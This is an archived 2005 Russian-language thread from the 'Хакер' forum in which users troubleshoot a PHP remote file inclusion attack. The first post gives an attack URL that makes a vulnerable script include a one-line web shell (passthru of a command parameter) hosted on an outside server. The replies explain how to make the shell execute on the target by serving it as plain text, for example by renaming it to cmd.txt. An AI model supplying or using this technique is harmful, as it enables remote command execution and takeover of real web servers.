Форумы на Хакер

Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.

PHP-injection

Пользователи, просматривающие топик: none

Зашли как: Guest

Все форумы >> [В Сети] >> PHP-injection

Имя

Сообщение

<< Старые топики Новые топики >>

PHP-injection - 2005-01-12 21:45:39

Aracon

Сообщений: 66
Оценки: 0
Присоединился: 2005-01-06 16:25:03

Вот такой вопрос есть насчет PHP-injection. Если есть скрипт с багом, то делаем такую ссылку:
http://site.com/bug.php?cmd=ls&show=http://rulez.ru/cmd.php
где cmd.php - это <? passthru($cmd); ?>
Только почему скрипт cmd.php выполняется сервером rulez.ru, т.е. я вижу список тех файлов, что _у меня_ на серваке? Как сделать инъекцию правильно?

Post #: 1

PHP-injection - 2005-01-13 01:58:16

Nightfly

Сообщений: 1381
Оценки: 0
Присоединился: 2004-03-12 11:46:07

если в скрипте bug.php имеется некое подобие

<?php
……
include($_GET['show']);
……
?>
то надо просто отдавать твой ремшелл в прямом виде, тоесть с хостинга например на котором не поддерживается php и с которого вываливается сам исходник спкрипта вместо его результатов.

ЗЫ ессно это только один часный и крайне дебильный случай. Просто мыслить надо более образно и не шаблонно.

Post #: 2

PHP-injection - 2005-01-14 10:32:30

Roneon

Сообщений: 220
Оценки: 0
Присоединился: 2004-03-12 09:02:53

проще сказать так: переименуй cmd.php в cmd.txt ;)

Post #: 3

Страниц: [1]

Все форумы >> [В Сети] >> PHP-injection

Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.